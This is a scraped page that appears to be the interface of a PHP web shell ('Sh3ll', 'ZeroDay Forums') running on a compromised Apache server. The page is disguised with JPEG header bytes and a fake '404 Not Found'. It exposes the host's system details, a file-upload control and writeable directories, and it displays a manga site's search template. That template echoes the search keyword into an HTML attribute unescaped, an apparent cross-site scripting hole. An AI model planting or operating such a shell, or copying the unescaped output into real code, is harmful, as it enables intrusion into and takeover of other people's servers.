ÿØÿàJFIFÿÛ„ ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/netphim/code/searchadvance/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/netphim/code/searchadvance/list_tpl.php
<div class="container">
    <nav aria-label="breadcrumb">
        <ol class="breadcrumb">
            <li class="breadcrumb-item"><a href="/">Home</a></li>
            <li class="breadcrumb-item active">Search advanced mangas</li>
        </ol>
    </nav>
    <div class="row">
        <form action="?" method="get">
            <input type="hidden" name="act" value="searchadvance">
        <div class="col-md-12">
        <div class="card">
            <div class="card-header">
                Search advanced mangas
                <div class="card-tools"><a href="/searchadvance/" class="text-info"><i class="fas fa-sync-alt"></i> Reset</a></div>
            </div>
            <div class="card-body">
                <span>Genres:</span>

                <div class="search_genres form-check form-check-inline" style="font-size: 13px;">
                    <?php echo get_list_genres_search($categories);?>
                </div>

                <div class="row mt-2">
                    <div class="col-md-4">
                        <div class="form-floating">
                            <select class="form-select" id="floatingSelectGridNumChapter" name="f[min_num_chapter]">
                                <option value="1">&gt;= 0 chapter</option>
                                <option value="50" <?php if(isset($f['min_num_chapter']) and $f['min_num_chapter']=='50'){echo 'selected';}?>>&gt;= 50 chapter</option>
                                <option value="100" <?php if(isset($f['min_num_chapter']) and $f['min_num_chapter']=='100'){echo 'selected';}?>>&gt;= 100 chapter</option>
                                <option value="200" <?php if(isset($f['min_num_chapter']) and $f['min_num_chapter']=='200'){echo 'selected';}?>>&gt;= 200 chapter</option>
                                <option value="300" <?php if(isset($f['min_num_chapter']) and $f['min_num_chapter']=='300'){echo 'selected';}?>>&gt;= 300 chapter</option>
                                <option value="400" <?php if(isset($f['min_num_chapter']) and $f['min_num_chapter']=='400'){echo 'selected';}?>>&gt;= 400 chapter</option>
                                <option value="500" <?php if(isset($f['min_num_chapter']) and $f['min_num_chapter']=='500'){echo 'selected';}?>>&gt;= 500 chapter</option>
                            </select>

                            <label for="floatingSelectGridNumChapter">Num. Chapter</label>
                        </div>
                    </div>
                    <div class="col-md-4">
                        <div class="form-floating">
                            <select class="form-select" id="floatingSelectGridStatus" name="f[status]">
                                <option value="">All</option>
                                <option value="Complete" <?php if(isset($f['status']) and $f['status']=='Complete'){echo 'selected';}?>>Complete</option>
                                <option value="In process" <?php if(isset($f['status']) and $f['status']=='In process'){echo 'selected';}?>>In process</option>
                                <option value="Pause" <?php if(isset($f['status']) and $f['status']=='Pause'){echo 'selected';}?>>Pause</option>
                            </select>
                            <label for="floatingSelectGridStatus">Status</label>
                        </div>
                    </div>
                    <div class="col-md-4">
                        <div class="form-floating">
                            <select class="form-select" id="floatingSelectGridSort" name="f[sortby]">
                                <option value="lastest-chap" <?php if(isset($f['sortby']) and $f['sortby']=='lastest-chap'){echo 'selected';}?>>Lasted chapter update</option>
                                <option value="lastest-manga" <?php if(isset($f['sortby']) and $f['sortby']=='lastest-manga'){echo 'selected';}?>>Lasted manga update</option>
                                <option value="top-manga" <?php if(isset($f['sortby']) and $f['sortby']=='top-manga'){echo 'selected';}?>>Manga with the most views</option>
                                <option value="top-month" <?php if(isset($f['sortby']) and $f['sortby']=='top-month'){echo 'selected';}?>>Manga with the most views in month</option>
                                <option value="top-week" <?php if(isset($f['sortby']) and $f['sortby']=='top-week'){echo 'selected';}?>>Manga with the most views in week</option>
                                <option value="top-day" <?php if(isset($f['sortby']) and $f['sortby']=='top-day'){echo 'selected';}?>>Manga with the most views in day</option>
                                <option value="follow" <?php if(isset($f['sortby']) and $f['sortby']=='follow'){echo 'selected';}?>>Manga with the most follow</option>
                                <option value="comment" <?php if(isset($f['sortby']) and $f['sortby']=='comment'){echo 'selected';}?>>Manga with the most comments</option>
                                <option value="num-chap" <?php if(isset($f['sortby']) and $f['sortby']=='num-chap'){echo 'selected';}?>>Manga with the most chapters</option>
                            </select>
                            <label for="floatingSelectGridSort">Sort by</label>
                        </div>
                    </div>
                </div>
                <div class="row mt-2">
                    <div class="col-md-12">
                        <div class="form-floating">
                        <input type="text" class="form-control" id="floatingInputValueKeyword" placeholder="Keyword" value="<?php
                        if(isset($f['keyword']) and !empty($f['keyword'])){echo trim($f['keyword']);}
?>" name="f[keyword]">
                        <label for="floatingInputValueKeyword">Keyword</label>
                        </div>
                    </div>
                </div>
                <div class="row mt-2 text-center">
                    <div class="col-md-12">
                        <button type="submit" class="btn btn-info text-white">Search</button>
                    </div>
                </div>

            </div>
        </div>
        </div>
        </form>

        <div class="col-md-12 mt-2">
            <div class="card">
                <div class="card-header">
                    Find <?php echo $total;?> mangas
                </div>
                <div class="card-body">
                    <div class="row">
                        <?php echo $list;?>
                    </div>
                </div>
                <div class="card-footer">
                    <nav aria-label="Page navigation">
                        <ul class="pagination justify-content-center">
                            <?php echo $nav;?>
                        </ul>
                    </nav>
                </div>
            </div>
        </div>
    </div>

</div>

ZeroDay Forums Mini